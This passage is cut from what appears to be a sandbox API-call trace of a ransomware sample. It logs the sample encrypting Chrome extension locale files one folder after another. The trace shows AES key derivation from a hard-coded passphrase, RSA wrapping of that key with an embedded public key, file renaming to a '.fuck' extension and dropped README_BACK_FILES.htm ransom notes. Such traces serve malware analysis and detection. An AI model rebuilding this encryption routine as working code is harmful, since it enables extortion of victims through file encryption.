Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json"), bFailIfExists=0) returned 1 [0250.710] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json", dwFileAttributes=0x0) returned 1 [0250.711] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json.gsg")) returned 1 [0250.712] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json.fuck")) returned 1 [0250.713] CryptDestroyHash (hHash=0x2985a60) returned 1 [0250.713] CryptDestroyKey (hKey=0x2985d20) returned 1 [0250.713] CryptReleaseContext (hProv=0x29887d0, dwFlags=0x0) returned 1 [0250.713] FindNextFileA (in: hFindFile=0x2985ea0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0250.713] FindClose (in: hFindFile=0x2985ea0 | out: hFindFile=0x2985ea0) returned 1 [0250.713] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\readme_back_files.htm")) returned 0xffffffff [0250.714] AreFileApisANSI () returned 1 [0250.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0250.714] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0250.715] GetFileType (hFile=0x5d54) returned 0x1 [0250.715] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0250.716] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0250.716] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985a60 [0250.716] FindNextFileA (in: hFindFile=0x2985a60, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.716] FindNextFileA (in: hFindFile=0x2985a60, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.716] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0250.716] GetLastError () returned 0x0 [0250.716] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json")) returned 0x20 [0250.716] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json", dwFileAttributes=0x80) returned 1 [0250.717] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0250.717] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0250.718] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0250.718] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2988c98) returned 1 [0250.721] CryptCreateHash (in: hProv=0x2988c98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0250.721] lstrlenA (lpString="YpinUbJDdIEgxfEoLIcGdepQzMlQm") returned 29 [0250.721] CryptHashData (hHash=0x2985f60, pbData=0x28cb788, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0250.721] CryptDeriveKey (in: hProv=0x2988c98, Algid=0x6610, hBaseData=0x2985f60, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2985ea0) returned 1 [0250.721] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----h", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0250.721] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0250.721] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x29887d0) returned 1 [0250.722] CryptImportPublicKeyInfo (in: hCryptProv=0x29887d0, dwCertEncodingType=0x1, pInfo=0x2991800*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2991830*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2991838*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29859e0) returned 1 [0250.722] CryptEncrypt (in: hKey=0x29859e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0250.722] CryptEncrypt (in: hKey=0x29859e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x29891e8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x29891e8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0250.722] WriteFile (in: hFile=0x5d58, lpBuffer=0x29891e8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x29891e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0250.723] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x152, lpOverlapped=0x0) returned 1 [0250.724] CryptEncrypt (in: hKey=0x2985ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x152, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x160) returned 1 [0250.724] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x160, lpOverlapped=0x0) returned 1 [0250.724] CloseHandle (hObject=0x5d5c) returned 1 [0250.724] CloseHandle (hObject=0x5d58) returned 1 [0250.724] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json"), bFailIfExists=0) returned 1 [0250.727] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json", dwFileAttributes=0x0) returned 1 [0250.728] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json.gsg")) returned 1 [0250.729] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json.fuck")) returned 1 [0250.732] CryptDestroyHash (hHash=0x2985f60) returned 1 [0250.732] CryptDestroyKey (hKey=0x2985ea0) returned 1 [0250.732] CryptReleaseContext (hProv=0x2988c98, dwFlags=0x0) returned 1 [0250.732] FindNextFileA (in: hFindFile=0x2985a60, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0250.732] FindClose (in: hFindFile=0x2985a60 | out: hFindFile=0x2985a60) returned 1 [0250.732] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\readme_back_files.htm")) returned 0xffffffff [0250.732] AreFileApisANSI () returned 1 [0250.732] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3af0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0250.733] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0250.733] GetFileType (hFile=0x5d54) returned 0x1 [0250.733] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0250.735] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0250.735] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ea0 [0250.736] FindNextFileA (in: hFindFile=0x2985ea0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.736] FindNextFileA (in: hFindFile=0x2985ea0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.736] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0250.736] GetLastError () returned 0x0 [0250.736] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json")) returned 0x20 [0250.736] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json", dwFileAttributes=0x80) returned 1 [0250.737] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0250.737] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0250.738] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0250.738] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2989270) returned 1 [0250.740] CryptCreateHash (in: hProv=0x2989270, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0250.740] lstrlenA (lpString="YpinUbJDdIEgxfEoLIcGdepQzMlQm") returned 29 [0250.740] CryptHashData (hHash=0x2985f20, pbData=0x28cb620, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0250.740] CryptDeriveKey (in: hProv=0x2989270, Algid=0x6610, hBaseData=0x2985f20, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2985aa0) returned 1 [0250.741] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----h", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0250.741] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0250.741] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2988c98) returned 1 [0250.741] CryptImportPublicKeyInfo (in: hCryptProv=0x2988c98, dwCertEncodingType=0x1, pInfo=0x29920f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2992120*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2992128*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2985f60) returned 1 [0250.741] CryptEncrypt (in: hKey=0x2985f60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0250.741] CryptEncrypt (in: hKey=0x2985f60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x29881f8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x29881f8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0250.741] WriteFile (in: hFile=0x5d5c, lpBuffer=0x29881f8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x29881f8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0250.742] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x112, lpOverlapped=0x0) returned 1 [0250.743] CryptEncrypt (in: hKey=0x2985aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x112, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x120) returned 1 [0250.743] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x120, lpOverlapped=0x0) returned 1 [0250.743] CloseHandle (hObject=0x5d58) returned 1 [0250.743] CloseHandle (hObject=0x5d5c) returned 1 [0250.743] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json"), bFailIfExists=0) returned 1 [0250.748] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json", dwFileAttributes=0x0) returned 1 [0250.749] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json.gsg")) returned 1 [0250.750] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json.fuck")) returned 1 [0250.751] CryptDestroyHash (hHash=0x2985f20) returned 1 [0250.751] CryptDestroyKey (hKey=0x2985aa0) returned 1 [0250.751] CryptReleaseContext (hProv=0x2989270, dwFlags=0x0) returned 1 [0250.751] FindNextFileA (in: hFindFile=0x2985ea0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0250.751] FindClose (in: hFindFile=0x2985ea0 | out: hFindFile=0x2985ea0) returned 1 [0250.751] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\readme_back_files.htm")) returned 0xffffffff [0250.751] AreFileApisANSI () returned 1 [0250.751] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0250.751] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0250.752] GetFileType (hFile=0x5d54) returned 0x1 [0250.752] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0250.753] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0250.753] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985a20 [0250.753] FindNextFileA (in: hFindFile=0x2985a20, 